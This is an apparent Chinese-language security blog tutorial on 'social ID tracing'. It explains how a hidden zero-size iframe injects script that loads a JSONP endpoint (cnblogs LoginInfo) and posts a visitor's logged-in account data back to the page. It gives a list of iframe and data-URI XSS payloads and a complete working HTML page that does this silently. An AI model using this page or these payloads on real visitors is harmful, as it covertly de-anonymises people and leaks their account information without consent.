社交id溯源

社交id溯源的原理是,利用iFrame注入js脚本,动态添加jsonp的src实现外带cookies,但是在高版本chrome已经失效

这里测试使用的是chrome75,之前先要了解js callback机制

callback机制

调用的接口会返回一个函数体,直接执行callback函数

PAYLOAD

1
2
</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

多种利用方式如下:

1
2
3
4
5
6
<iframe src="vbscript:msgbox(1)"></iframe> (IE)  
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

整理payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Jsonp</title>
</head>
<body>
<!-- Jsonp -->

<!-- cnblogs -->
<iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name="
window.test = function(data) {
let s = {source: 'cnblogs', d: data};
window.parent.postMessage(s, '*');
}
let s = document.createElement('script');
s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test'
document.documentElement.appendChild(s);
" style="border-width: 0px;"></iframe>

<script>
window.addEventListener("message", function(e){
console.log(event.data);
}, false);
</script>

</body>
</html>